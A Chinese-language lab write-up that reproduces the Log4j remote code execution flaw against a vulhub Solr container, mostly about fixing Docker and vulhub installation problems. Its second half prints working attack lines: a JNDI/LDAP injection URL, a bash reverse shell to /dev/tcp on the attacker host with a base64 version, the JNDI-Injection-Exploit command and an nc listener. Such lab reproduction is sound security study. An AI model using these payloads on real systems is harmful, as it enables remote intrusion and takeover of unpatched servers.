LOG4介紹

是一個用Java編寫的可靠，快速和靈活的日志框架（API），它在Apache軟件許可下發(fā)布
log4j存在遠程代碼執(zhí)行漏洞、受影響版本2.x

部署環(huán)境

攻擊機環(huán)境：192.168.3.180

kail環(huán)境：192.168.203.12【NAT轉換的】

部署vluhub

具體流程參考其他博主，本文主要講解在部署vluhub過程中存在的幾個問題，作為記錄

問題一、apt-get install docker docker-compose，執(zhí)行失敗，下載失敗，修改外網下載也失敗

獲取離線安裝包

直通車

Releases · docker/compose · GitHub

具體版本

下載后存儲至

賦予執(zhí)行權限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

問題二、

wget https://github.com/vulhub/vulhub/archive/master.zip下載失敗?

手動下載https://github.com/vulhub/vulhub/archive/master.zip

上傳解壓

unzip vulhub-master.zip

cd vulhub-master

問題三、docker compose up -d執(zhí)行失敗

由于修改vluhub外網導致，需要切換成國內網絡

修改內容如下

重啟服務

再次執(zhí)行 docker compose up -d

端口8983搭建成功

地址訪問

http://192.168.203.12:8983/solr/admin/cores?action=1

?驗證是否存在漏洞

DNSLog Platform

?

替換發(fā)送請求

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}

?刷新dns右邊這個按鈕 出現(xiàn)下方內容則存在

?bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64編碼

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

獲取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

?

執(zhí)行

?java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成獲取ldap內容 有用

創(chuàng)建監(jiān)聽nc-lvvp 6666異常由于windwos 沒有安裝nc需要安裝

直通車

?netcat 1.11 for Win32/Win64

安裝后火絨會報毒，運行

然后在該路徑下執(zhí)行??nc-lvvp 6666

將生成ldap內容復制替換，重新刷新一下接口

http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}

?getshell了

大概就是這么個流程！

參考：

centos離線安裝docker,docker-compose_centos離線安裝docker-compose-CSDN博客

Log4j漏洞環(huán)境搭建以及復現(xiàn)拿getshell_dockerlog4j環(huán)境搭建-CSDN博客